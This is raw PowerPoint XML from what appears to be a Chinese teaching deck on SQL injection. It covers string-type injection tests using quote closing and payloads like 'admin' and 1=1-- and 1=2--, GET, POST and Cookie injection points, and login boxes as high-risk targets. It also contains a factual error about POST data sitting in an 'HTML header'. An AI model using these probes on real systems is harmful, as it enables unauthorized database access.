        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1514856" y="4877745"/>
            <a:ext cx="6824472" cy="1409033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2712478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2143125" y="214313"/>
            <a:ext cx="7886700" cy="933450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>、字符型注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829310" y="1005459"/>
            <a:ext cx="11005185" cy="4691380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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当输入的参数为字符串时，称为字符型。字符型和数字型最大的一个区别在于，</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数字型不需要单引号来闭合</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，而</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字符串一般需要通过单引号来闭合的</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例如数字型语句：</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id =3</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则字符型如下：</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name=’admin’</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因此，在构造</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payload</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时通过闭合单引号可以成功执行语句。</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685800" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>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23EA59E-6E00-5C51-834D-699F94884E3C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2894760" y="2080032"/>
              <a:ext cx="7638480" cy="2136240"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="墨迹 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C23EA59E-6E00-5C51-834D-699F94884E3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2885400" y="2070672"/>
                <a:ext cx="7657200" cy="215496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2143125" y="214313"/>
            <a:ext cx="7886700" cy="933450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>、字符型注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1847850" y="1341755"/>
            <a:ext cx="9920605" cy="4691380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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测试步骤：</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单引号</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name=’admin</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由于加单引号后变成三个单引号，则无法执行，程序会</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报错</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 </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and 1=1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此时</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语句为：</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name=’</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admin’ and 1=1</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也</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无法进行注入</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，还需要通过注释符号将其绕过；</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因此，加 </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and 1=1--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构造语句为：</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name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admin’ and 1=1--</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可成功执行返回结果</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正确</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p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75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3</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加</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and 1=2--  </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此时</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sql</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语句为：</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select * from table where name=’</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admin’ and 1=2--</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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则会</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报错</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如果满足以上三点，可以判断该</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url</a:t>
            </a:r>
            <a:r>
              <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为字符型注入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="l" defTabSz="685800" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="24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27860" y="0"/>
            <a:ext cx="9648190" cy="781685"/>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215687" y="9629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SQL注入类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654175" y="797560"/>
            <a:ext cx="10366375" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按HTTP提交方式分</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GET注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入点的位置在 GET 参数部分。比如有这样的一个链接http://xxx.com/news.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=1                   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POST注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入点位置在 POST 数据部分，常发生在表单中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。</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524187" y="319244"/>
            <a:ext cx="7886700" cy="933450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>项目架构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EAD1171-7DA8-7983-E7E8-BDDD1E57DA42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="4080" t="8672"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515904" y="1989000"/>
            <a:ext cx="11160191" cy="2880000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1914211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15607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方法的</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注入攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1799590" y="995045"/>
            <a:ext cx="9905365" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>HTTP 定义了与服务器交互的不同方法，最基本的方法是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> GET 和 POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>方式在客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过URL提交数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，数据在URL中可以看到，传输的数据少，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全性较低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。例如在日常中订购服务：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.text.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>text.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787015" y="3514725"/>
            <a:ext cx="4837430" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select * from table where id=3</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864AACD-B3B4-6EAE-9FA0-66E5DBECA44B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4685040" y="1736280"/>
              <a:ext cx="2139840" cy="74880"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="墨迹 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4864AACD-B3B4-6EAE-9FA0-66E5DBECA44B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4675680" y="1726920"/>
                <a:ext cx="2158560" cy="9360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15607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方法的</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注入攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1799590" y="782320"/>
            <a:ext cx="9905365" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>HTTP 定义了与服务器交互的不同方法，最基本的方法是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> GET 和 POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>方式，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据放置在HTML HEADER内提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，数据在URL中看不到，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传输的数据多，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全性较高。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2258695" y="4469765"/>
            <a:ext cx="5877560" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>POST注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高危点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>登录框</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>查询框</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>各种与数据库有交互的框</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
